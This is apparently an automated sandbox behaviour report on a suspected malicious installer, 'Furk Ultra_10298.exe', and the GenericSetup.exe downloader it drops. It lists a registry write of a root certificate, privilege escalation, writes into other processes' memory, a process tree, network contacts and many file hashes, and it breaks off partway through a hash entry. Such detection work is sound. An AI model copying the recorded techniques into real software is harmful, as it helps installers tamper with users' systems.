C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2180 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 2180 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 2180 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 5040 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe
PID 5040 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe
PID 5040 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe
PID 2180 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 2180 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 2180 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 2036 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe
PID 2036 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe
PID 2036 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"

C:\Users\Admin\AppData\Local\setup10298.exe

C:\Users\Admin\AppData\Local\setup10298.exe hhwnd=589872 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe

.\GenericSetup.exe hhwnd=589872 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN

C:\Users\Admin\AppData\Local\setup10298.exe

C:\Users\Admin\AppData\Local\setup10298.exe hready

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe

.\GenericSetup.exe hready

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1288 -ip 1288

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 3572

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 www.dlsft.com udp
N/A 35.190.60.70:443 www.dlsft.com tcp
N/A 35.190.60.70:443 www.dlsft.com tcp
N/A 8.8.8.8:53 dlsft.com udp
N/A 35.190.60.70:80 dlsft.com tcp
N/A 35.190.60.70:80 dlsft.com tcp
N/A 8.8.8.8:53 flow.lavasoft.com udp
N/A 104.18.88.101:443 flow.lavasoft.com tcp
N/A 8.8.8.8:53 sos.adaware.com udp
N/A 104.16.235.79:443 sos.adaware.com tcp
N/A 104.16.235.79:443 sos.adaware.com tcp
N/A 104.16.235.79:443 sos.adaware.com tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 104.80.225.205:443 tcp
N/A 8.8.8.8:53 226.101.242.52.in-addr.arpa udp
N/A 8.253.208.121:80 tcp
N/A 8.253.208.121:80 tcp

Files

memory/5040-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

C:\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

memory/1288-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe.config

MD5 fd63ee3928edd99afc5bdf17e4f1e7b6
SHA1 1b40433b064215ea6c001332c2ffa093b1177875
SHA256 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9
SHA512 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

memory/1288-139-0x00000000009C0000-0x00000000009CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

memory/1288-143-0x00000000052A0000-0x00000000052AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

memory/1288-147-0x0000000005D50000-0x000000000642A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

memory/1288-151-0x00000000056B0000-0x00000000056D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Ninject.dll

MD5 ce80365e2602b7cff0222e0db395428c
SHA1 50c9625eda1d156c9d7a672839e9faaea1dffdbd
SHA256 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5
SHA512 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

memory/1288-155-0x0000000005770000-0x000000000579C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\HtmlAgilityPack.dll

MD5 7874850410e21b5f48bfe34174fb318c
SHA1 19522b1b9d932aa89df580c73ef629007ec32b6f
SHA256 c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1
SHA512 dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa

memory/1288-156-0x0000000005A00000-0x0000000005A66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Core.dll

MD5 f931e960cc4ed0d2f392376525ff44db
SHA1 1895aaa8f5b8314d8a4c5938d1405775d3837109
SHA256 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870
SHA512 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Core.dll

MD5 f931e960cc4ed0d2f392376525ff44db
SHA1 1895aaa8f5b8314d8a4c5938d1405775d3837109
SHA256 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870
SHA512 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0

memory/1288-160-0x0000000005CF0000-0x0000000005D02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Core.dll

MD5 f931e960cc4ed0d2f392376525ff44db
SHA1 1895aaa8f5b8314d8a4c5938d1405775d3837109
SHA256 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870
SHA512 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\Newtonsoft.Json.dll

MD5 3c4d2f6fd240dc804e10bbb5f16c6182
SHA1 30d66e6a1ead9541133bad2c715c1971ae943196
SHA256 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e
SHA512 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d

memory/1288-164-0x0000000006EF0000-0x0000000006F6C000-memory.dmp

memory/1288-165-0x0000000007B30000-0x00000000080D4000-memory.dmp

memory/1288-166-0x0000000007860000-0x00000000078F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GenericSetup.exe_1673806433\sciter32.dll

MD5 b431083586e39d018e19880ad1a5ce8f
SHA1 3bbf957ab534d845d485a8698accc0a40b63cedd
SHA256 b525fdcc32c5a359a7f5738a30eff0c6390734d8a2c987c62e14c619f99d406b
SHA512 7805a3464fcc3ac4ea1258e2412180c52f2af40a79b540348486c830a20c2bbed337bbf5f4a8926b3ef98c63c87747014f5b43c35f7ec4e7a3693b9dbd0ae67b

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Extension.dll

MD5 28f1996059e79df241388bd9f89cf0b1
SHA1 6ad6f7cde374686a42d9c0fcebadaf00adf21c76
SHA256 c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce
SHA512 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29

memory/1288-171-0x00000000065A0000-0x00000000065CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Extension.dll

MD5 28f1996059e79df241388bd9f89cf0b1
SHA1 6ad6f7cde374686a42d9c0fcebadaf00adf21c76
SHA256 c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce
SHA512 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29

C:\Users\Admin\AppData\Local\Temp\7zS0B33D9A6\MyDownloader.Extension.dll

MD5 28f1996059e79df241388bd9f89cf0b1
SHA1 6ad6f7cde374686a42d9c0fcebadaf00adf21c76
SHA256 c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce
SHA512 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29

memory/2036-172-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\setup10298.exe

MD5 369acf60d8b5ed6168c74955ee04654f
SHA1 1753fff63efa6ed5ad30ede6b959261ac67dd13e
SHA256 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632
SHA512 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643

memory/856-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe.config

MD5 fd63ee3928edd99afc5bdf17e4f1e7b6
SHA1 1b40433b064215ea6c001332c2ffa093b1177875
SHA256 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9
SHA512 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.exe

MD5 85b0a721491803f8f0208a1856241562
SHA1 90beb8d419b83bd76924826725a14c03b3e6533f
SHA256 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345
SHA512 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.LastScreen.dll

MD5 3319432d3a694a481f5672fa9eb743d0
SHA1 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9
SHA256 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693
SHA512 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
SHA512 b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb

C:\Users\Admin\AppData\Local\Temp\7zS4F7863E7\GenericSetup.dll

MD5 4d65e6eb25db2ce61f4a7a48d9f6082a
SHA1 130abbae19f227b0ef4f278e90398b3b3c7c2eff
SHA256 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a
